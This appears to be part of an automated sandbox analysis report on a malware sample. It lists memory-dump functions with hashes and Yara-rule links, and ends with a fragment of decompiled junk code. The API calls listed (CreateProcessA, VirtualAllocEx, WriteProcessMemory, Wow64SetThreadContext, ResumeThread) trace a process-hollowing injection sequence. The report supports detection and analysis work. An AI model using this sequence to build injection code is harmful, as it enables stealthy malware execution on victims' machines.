Instruction Fuzzy Hash: 3F911170E002288FDB14CFA9C8407EEBBB6BF89314F50D4A9D509AB215EB354E858F60

Uniqueness

Uniqueness Score: -1.00%

Function 005362B0, Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166621325.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 651ff7a203a418cc50727e0f2cb684d27fa6d31a9c82e1afe20e0c0619398f53
Instruction ID: 134b0f7279b93592e589c556b912983b83f89759f10e5477da76768c12c397e3
Opcode Fuzzy Hash: 651ff7a203a418cc50727e0f2cb684d27fa6d31a9c82e1afe20e0c0619398f53
Instruction Fuzzy Hash: 5E81B174E012189FDB08CFEAC884A9EBBB2FF89300F24942AD515AB364D7359945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00532402, Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166621325.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b53eb79ceacc67aab40c6c472c9607a283fa02b58610fac465edacecfc3d38f7
Instruction ID: 52f7f159d026d5372713fc1222a848e02703f318f2dab4aeade7bbc13b6e7475
Opcode Fuzzy Hash: b53eb79ceacc67aab40c6c472c9607a283fa02b58610fac465edacecfc3d38f7
Instruction Fuzzy Hash: CF711671E006598FCF15DFA5C840ADEBBB2BF8A314F5484A9D508BB225DB315E85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00DA4A80, Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2167571086.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f7530ee581e0df6a8c7510c539ca6ad50767e43fdc8d88905901282dc527d98
Instruction ID: 75e323a637883ae1383d14038de09827160ea711f8cb81311bb6bd440158fbcd
Opcode Fuzzy Hash: 1f7530ee581e0df6a8c7510c539ca6ad50767e43fdc8d88905901282dc527d98
Instruction Fuzzy Hash: 98615B70E00629CBDB64CF66C8447EDB7B6BFDA300F10D5AAC50DA7214EB709A859F60

Uniqueness

Uniqueness Score: -1.00%

Function 00536AE0, Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166621325.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0526c137c356d2f4e7ff75314c531cd0fb711cab21c34ddc102ae03591008a8d
Instruction ID: 54b2adde989b660f3dac7fdf6be7d489903fd8d6687d696d34042307bb646d16
Opcode Fuzzy Hash: 0526c137c356d2f4e7ff75314c531cd0fb711cab21c34ddc102ae03591008a8d
Instruction Fuzzy Hash: 0C510770E042199FDB08CFAAC8506AEFBF2FB89301F24D46AD519E7255D7345A018FA5

Uniqueness

Uniqueness Score: -1.00%

Function 0053F050, Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166621325.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cbfd29c33c8fb03b051d88d0de002dfc4707f5aab40a66525ab1fea4687aa71
Instruction ID: c06b3a79a88b8d3d3f496024e0aa3b4599e8e3576d58b057043619cf5bb067fc
Opcode Fuzzy Hash: 9cbfd29c33c8fb03b051d88d0de002dfc4707f5aab40a66525ab1fea4687aa71
Instruction Fuzzy Hash: 7E51F175E10719DBCB14CFE9D9445DDFBB6FF89300F208A2AD51AAB214EB306946CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00DA4C64, Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2167571086.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48ecefffe9ba6d5c0b371d610740172ae41d29e5bfd6a90b5fabc778a532ffd7
Instruction ID: 7a17150196d3f90a24840e382479b7a0e966b6d7dd17d90a052aa8269627e608
Opcode Fuzzy Hash: 48ecefffe9ba6d5c0b371d610740172ae41d29e5bfd6a90b5fabc778a532ffd7
Instruction Fuzzy Hash: D1510671D0162ACBDB64CF25D844BDDB6B2BF99300F1085E6D10AB7214EB709AC59F60

Uniqueness

Uniqueness Score: -1.00%

Function 00535700, Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166621325.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0c684e829e25894be4b0f8c82b32de07653513fdee7c1a59b00225b1ba59072
Instruction ID: 6b47d7a39e6be405611c64fa89695207d45ad732e04b7037886f323966744e18
Opcode Fuzzy Hash: f0c684e829e25894be4b0f8c82b32de07653513fdee7c1a59b00225b1ba59072
Instruction Fuzzy Hash: D641FB75E05618CFEB18CFAAD84079EBBF3AFC9300F14C0AAD509AB255DB345A458F61

Uniqueness

Uniqueness Score: -1.00%

Function 005374D0, Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166621325.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64c594f9f734f63f2827a13a2556e31e39af74ea2c6143af338b408d151d5456
Instruction ID: c5aa5aede59a3a3d029236c53ffe1ac81ef2af6cb920a3219f9d8f46a001c366
Opcode Fuzzy Hash: 64c594f9f734f63f2827a13a2556e31e39af74ea2c6143af338b408d151d5456
Instruction Fuzzy Hash: 702126B1E056588BDB18CFAA98402DEFBF3AFC9300F14C16AD409A6265DB340949CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00DA3334, Relevance: 1.8, APIs: 1, Instructions: 327processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00DA3607

Memory Dump Source

Source File: 00000004.00000002.2167571086.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 2ac53f437e1e13e30482527b467f26045a1e77949256db82af80b3ccbb559580
Instruction ID: a200d8c0b8ee2acb8d38b44ce07f555df5f65b4bfa11f968e5d4c8648627a774
Opcode Fuzzy Hash: 2ac53f437e1e13e30482527b467f26045a1e77949256db82af80b3ccbb559580
Instruction Fuzzy Hash: 02C137B5D0022D8FDB21CFA4C8417EDBBB2BF09304F1495A9E859B7240DB749A85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00DA3340, Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00DA3607

Memory Dump Source

Source File: 00000004.00000002.2167571086.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: aeaf7f77a805b0b78719530c2be77b784d77120c0f916b4d834fbeed05da2a85
Instruction ID: 406b082a314cb70fe10cf01777b34cbc880eddd0f4a0a7553d4df0557bf7ed64
Opcode Fuzzy Hash: aeaf7f77a805b0b78719530c2be77b784d77120c0f916b4d834fbeed05da2a85
Instruction Fuzzy Hash: E1C128B1D0021D8FDB21CFA4C8417EDBBB2BF49304F1495A9E859B7240DB749A85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00DA2748, Relevance: 1.6, APIs: 1, Instructions: 127threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 00DA27FF

Memory Dump Source

Source File: 00000004.00000002.2167571086.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 9737ef676fcc1066f3328fb7f512fe6125403fa57ebb4c2daa14150d7fd0e95e
Instruction ID: f568fc2b8b7aa30dba26623a216ef801e22c2ed5a0eaeff05a1a2990f052c76d
Opcode Fuzzy Hash: 9737ef676fcc1066f3328fb7f512fe6125403fa57ebb4c2daa14150d7fd0e95e
Instruction Fuzzy Hash: 9E41BEB5D012589FCF10CFA9D884AEDFBB1BF49314F24842AE815B7240D738A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00DA2E49, Relevance: 1.6, APIs: 1, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00DA2F2A

Memory Dump Source

Source File: 00000004.00000002.2167571086.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 53ead22764b11eed90ef6631d815fcf50b3f69bae6d88a11c80349ae3b6f7971
Instruction ID: 2d23f1d35850ba3cc05ff587e5ba8aa55034578f06a84b274ee48cc550e4ec8c
Opcode Fuzzy Hash: 53ead22764b11eed90ef6631d815fcf50b3f69bae6d88a11c80349ae3b6f7971
Instruction Fuzzy Hash: CA41CFB4D002489FCF00CFA9D984ADEBBB1FF4A314F10956AE854B7214D734A906CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00DA2FA1, Relevance: 1.6, APIs: 1, Instructions: 119injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00DA307B

Memory Dump Source

Source File: 00000004.00000002.2167571086.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 0e5bc5562790d2fa180b447ed899b4179b3ca00d4ef2855c9fcc6cc446090f0e
Instruction ID: c16f258b31bbbb3a3cb1cd74b079b5ee194c901d878684c4fd3f846f6f3ca6b9
Opcode Fuzzy Hash: 0e5bc5562790d2fa180b447ed899b4179b3ca00d4ef2855c9fcc6cc446090f0e
Instruction Fuzzy Hash: E841BBB4D012589FCF00CFA9D984AEEFBF1BB09304F24942AE814B7210D735AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00DA2FA8, Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00DA307B

Memory Dump Source

Source File: 00000004.00000002.2167571086.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 8f9805bca41cbb3feb590d645768396e4a033180ade2230d9509fb96f0f391ea
Instruction ID: 037105f6497385fae562dda457ac06e6085e71df4049e3379a825de89584d718
Opcode Fuzzy Hash: 8f9805bca41cbb3feb590d645768396e4a033180ade2230d9509fb96f0f391ea
Instruction Fuzzy Hash: 6E41ABB5D012589FCF00CFA9D984AEEFBF1BB49314F24942AE815B7200D735AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00DA3100, Relevance: 1.6, APIs: 1, Instructions: 109COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00DA31BA

Memory Dump Source

Source File: 00000004.00000002.2167571086.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: fcc2f2fab24e453d91afdd9973544e3efc362b6c6890691e0d993036b6a2f784
Instruction ID: 00d98aaa636cf5348dde5dd70e6df093927b99fbca008ae0d537122129cf9ea3
Opcode Fuzzy Hash: fcc2f2fab24e453d91afdd9973544e3efc362b6c6890691e0d993036b6a2f784
Instruction Fuzzy Hash: 14419CB9D00258DFCF10CFA9D980AEEFBB1BB49314F24942AE815B7210D735A946CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00DA3108, Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00DA31BA

Memory Dump Source

Source File: 00000004.00000002.2167571086.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: db8e48bcfa2b43757aee687b986eda61a8d3864b9d5cfe0c109b3fd84dc9d31e
Instruction ID: c97c5b74f6462377854520ce11d908f140c89fec32fe802cbfb6cccd663f4d72
Opcode Fuzzy Hash: db8e48bcfa2b43757aee687b986eda61a8d3864b9d5cfe0c109b3fd84dc9d31e
Instruction Fuzzy Hash: 4E41B9B9D002589FCF00CFA9D884AEEFBB5BF49310F20942AE815B7200D735AA45CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00DA2E80, Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00DA2F2A

Memory Dump Source

Source File: 00000004.00000002.2167571086.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: da0254265587322096b8f3affefb9c4bc5aeaa6a3e847c2f72e44692b32e4e30
Instruction ID: 22bb119355909e3a65472d02eecfe7a5eef73d91affa6c737048d820d3254f83
Opcode Fuzzy Hash: da0254265587322096b8f3affefb9c4bc5aeaa6a3e847c2f72e44692b32e4e30
Instruction Fuzzy Hash: 184199B8D002589FCF10CFA9D884AEEFBB5BF49314F20942AE815B7200D775A905CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00DA2658, Relevance: 1.6, APIs: 1, Instructions: 97threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 00DA26DE

Memory Dump Source

Source File: 00000004.00000002.2167571086.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 894b2de9c080bb653f62517a67cddc0197072c1855eaa4abc67507311e914924
Instruction ID: d8739c46a53a94daba90d302f9dbc516131363e40e1d32f9f8089660badb27a2
Opcode Fuzzy Hash: 894b2de9c080bb653f62517a67cddc0197072c1855eaa4abc67507311e914924
Instruction Fuzzy Hash: 9941DDB4D012189FCB10CFA9D885AEEFBF4BB49314F24846AE818B3300D775A901CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0053DD48, Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0053DDEF

Memory Dump Source

Source File: 00000004.00000002.2166621325.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 76c5452410a7f6fce8d94b60b51fb1f0946592106d77e8c0172c409fec6103c8
Instruction ID: c8f0f4ad68a71d9a4083a22021b61176110eefa20f7cfa264022e0d699434508
Opcode Fuzzy Hash: 76c5452410a7f6fce8d94b60b51fb1f0946592106d77e8c0172c409fec6103c8
Instruction Fuzzy Hash: C731ABB9D002589FCF10CFA9E484ADEFBB5BB09310F24942AE824B7310D335A945CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00DA2750, Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 00DA27FF

Memory Dump Source

Source File: 00000004.00000002.2167571086.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 180e95e09774373507f6c7cf326c227195bb32e5635088b92b4211a1b8c21eb6
Instruction ID: b4968e7e5603c423f5129578d6034542cfdace17e64afffc7efac7dce7f62c43
Opcode Fuzzy Hash: 180e95e09774373507f6c7cf326c227195bb32e5635088b92b4211a1b8c21eb6
Instruction Fuzzy Hash: EF41BDB4D012589FCB10CFA9D884AEEFBF5BF49314F24842AE419B7240D779A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00DA16F0, Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

OutputDebugStringW.KERNELBASE(?), ref: 00DA1792

Memory Dump Source

Source File: 00000004.00000002.2167571086.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: fc191f9d9fae443368836f08ff3b22c7ca27c339f71e7551866115cdfef29f8b
Instruction ID: 8bfe762025b3dd4e3e1f3d45ee921f3d883d807685d2edf36ef65ecd2e37d63b
Opcode Fuzzy Hash: fc191f9d9fae443368836f08ff3b22c7ca27c339f71e7551866115cdfef29f8b
Instruction Fuzzy Hash: 2D31CBB8D002589FCB14CFA9D984ADEFBF1AF49314F24906AE815B7320D734A946CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00DA16F8, Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

OutputDebugStringW.KERNELBASE(?), ref: 00DA1792

Memory Dump Source

Source File: 00000004.00000002.2167571086.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: 950f756ff3505d62007d691c074ba063b6e7607eefcab87602f8ab5bbccb3224
Instruction ID: 1f5c2e1b370dc325e4276a50313e59e66b22ea61d352a20760b61881dc6775e5
Opcode Fuzzy Hash: 950f756ff3505d62007d691c074ba063b6e7607eefcab87602f8ab5bbccb3224
Instruction Fuzzy Hash: 2031A8B8D00259DFCB14CFA9D984ADEFBF5AB49314F24902AE818B7310D734A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00DA2660, Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 00DA26DE

Memory Dump Source

Source File: 00000004.00000002.2167571086.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 704a76c000f61f39437cae0e98cdac7bd2f6059bfac74afedf1039ad6c2791a5
Instruction ID: 243cf9a1f192930e0dba94468b258087fe0cbd78b31d26d69c79a6caf3c3a989
Opcode Fuzzy Hash: 704a76c000f61f39437cae0e98cdac7bd2f6059bfac74afedf1039ad6c2791a5
Instruction Fuzzy Hash: 88319BB4D012189FCF14CFA9E884AEEFBB5AF49314F24942AE815B7300D775A905CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00DA17E8, Relevance: 1.4, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 00DA186E

Memory Dump Source

Source File: 00000004.00000002.2167571086.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: ed48f3f866f22a80cc59f7972b106a1d93d0425f4c389b1ab0003d6d06548cc1
Instruction ID: a71f80957db74394d8ad3e611f0bd6ad0ff80fa047647071a880df93657f28b6
Opcode Fuzzy Hash: ed48f3f866f22a80cc59f7972b106a1d93d0425f4c389b1ab0003d6d06548cc1
Instruction Fuzzy Hash: CE41AEB9D042599FCF10CFA9D484AEDFBF0AB49324F24945AE815B3310C339A945CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00DA17F0, Relevance: 1.3, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 00DA186E

Memory Dump Source

Source File: 00000004.00000002.2167571086.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: c00a87a6197b490db83b24a9f34307293cbbfc2be455410713a3e3f8d21758f1
Instruction ID: 9b20973e85d7f3f1ac38d050fed611725bcf46cbfa128806c4c304fe58fcc9fd
Opcode Fuzzy Hash: c00a87a6197b490db83b24a9f34307293cbbfc2be455410713a3e3f8d21758f1
Instruction Fuzzy Hash: FD31BDB8D002189FCB10CFA9D484AEEFBF4AB49314F24945AE824B7310C339A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0043D1D4, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166560903.000000000043D000.00000040.00000001.sdmp, Offset: 0043D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01376b4023e39ec0e2fb74ecdf82b7a36348937462f0628e69b422a40efe9ad6
Instruction ID: e23861795ac04194e8c1142f4b2881bb4312a80248a1a1ae9db428f341bda379
Opcode Fuzzy Hash: 01376b4023e39ec0e2fb74ecdf82b7a36348937462f0628e69b422a40efe9ad6
Instruction Fuzzy Hash: FC21F575A04204DFDB11DF50E980B17BBA5FB88314F30C9AEE8094B342C73AD806CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0043D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166560903.000000000043D000.00000040.00000001.sdmp, Offset: 0043D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49d9e5621eacf7fe3d5d08de44746792f6d367a73bae51097ee3d82f7997ff36
Instruction ID: 06a0d040b6cf3097b4d3d32c888e85dfac9a5c7348aa1ed851f526725edc49d7
Opcode Fuzzy Hash: 49d9e5621eacf7fe3d5d08de44746792f6d367a73bae51097ee3d82f7997ff36
Instruction Fuzzy Hash: D121F575A04244DFDB18DF64E884B16BBB5FB88718F30C96AD8494B346C33AD807CB66

Uniqueness

Uniqueness Score: -1.00%

Function 0043D006, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166560903.000000000043D000.00000040.00000001.sdmp, Offset: 0043D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f7c1dd3253f74edf99a29d356b9bb234828cd558802ab3b26c4baa2c0367b58
Instruction ID: fd150d58bb51b60b336d74051e0b246c93c826ca7deb3234e1c19a5d87eadabc
Opcode Fuzzy Hash: 1f7c1dd3253f74edf99a29d356b9bb234828cd558802ab3b26c4baa2c0367b58
Instruction Fuzzy Hash: 35214F755093808FCB16CF24D994716BF71EB46714F28C5DBD8498B697C33A980ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0043D1CF, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166560903.000000000043D000.00000040.00000001.sdmp, Offset: 0043D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13f25f2b4513098e7777517fd4da77a92fef37a780737990c108bf61b3c62d7b
Instruction ID: 548f94ff06c94d0a38fb4d16f41abfa54f5cfc914a134f2794d66d512c3ce26f
Opcode Fuzzy Hash: 13f25f2b4513098e7777517fd4da77a92fef37a780737990c108bf61b3c62d7b
Instruction Fuzzy Hash: 50118B75904280DFCB12CF14E5C4B16BBA1FB88324F24C6AAD8494B756C33AD85ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 0042D1D9, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166518980.000000000042D000.00000040.00000001.sdmp, Offset: 0042D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86fae34301f8ccc54b1e59cbc825f4650de5712165fe20d6cbea15dbc1aed207
Instruction ID: 96e6eec2c37d2e88ae4e880cf4a16aeee391e145d7ca0cbf5bb07bd365ab13d6
Opcode Fuzzy Hash: 86fae34301f8ccc54b1e59cbc825f4650de5712165fe20d6cbea15dbc1aed207
Instruction Fuzzy Hash: 65012431904360DAD7108A56E888B67FB88EF41324F68889BED041B282C33CDC04CBB6

Uniqueness

Uniqueness Score: -1.00%

Function 0042D1D8, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166518980.000000000042D000.00000040.00000001.sdmp, Offset: 0042D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48746a509f54b8352282fc4759508ac9793979b27a75335cb8d1a70f79988645
Instruction ID: d327ac1562965d53839ac23f27bb245a78804e9f5ca2037e215994cbe7c45195
Opcode Fuzzy Hash: 48746a509f54b8352282fc4759508ac9793979b27a75335cb8d1a70f79988645
Instruction Fuzzy Hash: 52F0AF714042909AEB108A06D888B67FF98EB91324F68C49AEC085B286C3799844CBB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00539E10, Relevance: 3.9, Strings: 3, Instructions: 162COMMON

Download Yara Rule

Strings

VPc|, xrefs: 00539F36
VPc|, xrefs: 00539F2F
VPc|, xrefs: 00539F4D

Memory Dump Source

Source File: 00000004.00000002.2166621325.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Similarity

API ID:
String ID: VPc|$VPc|$VPc|
API String ID: 0-3650269562
Opcode ID: 546d5518d11d9ce4f2086c4465c31b697556817b36b078c44308df5ff442283e
Instruction ID: 69d6998f109452f5c665a9bf6aedaf0ec8b37de03fb0ef94401cdcbc990a25a2
Opcode Fuzzy Hash: 546d5518d11d9ce4f2086c4465c31b697556817b36b078c44308df5ff442283e
Instruction Fuzzy Hash: 3F71E0B4E0520ACFCB04CF99D5809AEFFB6BF88310F24995AD415AB315D374A982DF94

Uniqueness

Uniqueness Score: -1.00%

Function 00539E00, Relevance: 3.9, Strings: 3, Instructions: 155COMMON

Download Yara Rule

Strings

VPc|, xrefs: 00539F36
VPc|, xrefs: 00539F2F
VPc|, xrefs: 00539F4D

Memory Dump Source

Source File: 00000004.00000002.2166621325.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Similarity

API ID:
String ID: VPc|$VPc|$VPc|
API String ID: 0-3650269562
Opcode ID: 0a393e2d9683a9018380a680e7dead8933a0e57553e0a810c07f9e9b015f376a
Instruction ID: a3fcfdbe6cb246c20a7ce1875baea01678e849a24ea9ece96c638c5b8e5db169
Opcode Fuzzy Hash: 0a393e2d9683a9018380a680e7dead8933a0e57553e0a810c07f9e9b015f376a
Instruction Fuzzy Hash: 5E61E3B4E0520ACFCB04CFA9C5809AEFFB6BF88310F249956D415AB315D374A982DF94

Uniqueness

Uniqueness Score: -1.00%

Function 00539908, Relevance: 2.6, Strings: 2, Instructions: 122COMMON

Download Yara Rule

Strings

58/2, xrefs: 005398A3
58/2, xrefs: 005398AA

Memory Dump Source

Source File: 00000004.00000002.2166621325.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Similarity

API ID:
String ID: 58/2$58/2
API String ID: 0-2814864058
Opcode ID: e100d4b43003a021acb31d9a37ce4ddcb4dcacb8709ed2db902bf93c96082891
Instruction ID: dbaf11a1583559fb75430a98cffd945e95c8dbe8b861f2cd37658554101e9829
Opcode Fuzzy Hash: e100d4b43003a021acb31d9a37ce4ddcb4dcacb8709ed2db902bf93c96082891
Instruction Fuzzy Hash: FE414AB1E0524ADFCB04CFA9C5809AEFFB1FF89300F24859AC46AA7211D7749A42CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00DB2050, Relevance: 2.2, Instructions: 2218
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E00DB2050(intOrPtr* __eax, signed int* __ebx, signed int __ecx, intOrPtr* __edx, intOrPtr* __edi, intOrPtr* __esi, void* __fp0) {
				signed char _t278;
				signed char _t279;
				intOrPtr* _t281;
				signed char _t282;
				signed char _t283;
				signed char _t284;
				signed char _t285;
				signed char _t287;
				signed char _t288;
				signed char _t289;
				intOrPtr* _t290;
				signed char _t291;
				signed char _t292;
				signed char _t293;
				intOrPtr* _t294;
				intOrPtr* _t522;
				signed int* _t524;
				signed char _t546;
				void* _t547;
				void* _t549;
				signed char _t550;
				signed char _t551;
				signed char _t552;
				signed char _t553;
				signed char _t554;
				signed char _t555;
				intOrPtr* _t613;
				intOrPtr* _t615;
				signed int* _t616;
				intOrPtr* _t617;
				intOrPtr* _t618;
				signed int* _t619;
				signed int* _t620;
				intOrPtr* _t654;
				intOrPtr* _t657;
				signed int _t662;
				void* _t680;
				void* _t952;

				_t657 = __esi;
				_t654 = __edi;
				_t524 = __ebx;
				asm("sbb esi, [eax]");
				_t278 = __eax +  *__eax;
				_pop(ds);
				 *_t278 =  *_t278 + _t278;
				 *_t278 =  *_t278 + _t278;
				 *_t278 =  *_t278 + _t278;
				 *_t278 =  *_t278 + _t278;
				 *_t278 =  *_t278 + __ecx;
				_pop(ds);
				 *_t278 =  *_t278 + _t278;
				_t546 = __ecx |  *_t278;
				 *_t278 =  *_t278 & _t278;
				 *__edx =  *__edx + _t546;
				_t613 = __edx + __ebx;
				_t279 = _t278 +  *_t278;
				_t952 = __fp0 +  *_t279;
				 *__edi =  *__edi - _t279;
				 *_t279 =  *_t279 + _t279;
				_push(es);
				_t547 = _t546 +  *((intOrPtr*)(__edi + 0x21));
				 *_t279 =  *_t279 + _t279;
				_t281 = (_t279 |  *_t279) -  *(_t279 |  *_t279);
				 *_t281 =  *_t281 + _t613;
				 *_t281 =  *_t281 + _t281;
				_t282 = _t281 +  *_t281;
				 *_t282 =  *_t282 + _t282;
				_push(cs);
				asm("sldt word [edx]");
				 *_t282 =  *_t282 + _t282;
				 *_t282 =  *_t282 + _t282;
				asm("stosb");
				 *_t613 =  *_t613 + _t282;
				 *_t613 =  *_t613 - _t282;
